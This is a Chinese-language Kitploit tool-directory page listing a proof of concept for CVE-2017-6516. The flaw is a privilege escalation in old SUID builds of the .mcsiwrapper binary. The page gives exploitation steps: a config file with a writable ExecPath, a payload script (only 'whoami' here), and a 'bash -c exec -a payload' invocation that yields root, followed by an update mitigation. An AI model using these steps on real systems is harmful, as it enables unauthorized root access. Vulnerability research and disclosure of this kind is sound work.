Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-6516-mcsiwrapper- — A PoC / methodology to exploit CVE-2017-6516 | Kitploit
工具/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

A PoC / methodology to exploit CVE-2017-6516

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-6516

CVE-2017-6516 是一个提权漏洞,针对 MagniCorp SysInfo 版本低于 10-H64 的 .mcsiwrapper 二进制文件。当此二进制文件的 SUID 位被设置且版本过旧时,用户可以以该二进制文件的所有者(通常为 root)身份执行任意代码。

要求

  • 二进制文件 .mcsiwrapper 必须设置 setuid:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • 二进制文件 .mcsiwrapper 必须低于版本 10-H64:
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

利用方法

创建一个名为 config 的文件,内容如下:

root@kitploit:~
ExecPath=<Path to a writeable directory>

在 ExecPath 目录中创建一个可执行的 payload 文件,例如:

root@kitploit:~
#!/bin/sh
whoami

并使其可执行:

root@kitploit:~
$ chmod +x payload

运行命令:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

缓解措施

将 .mcsiwrapper 更新到至少 10-H64 版本。

下载工具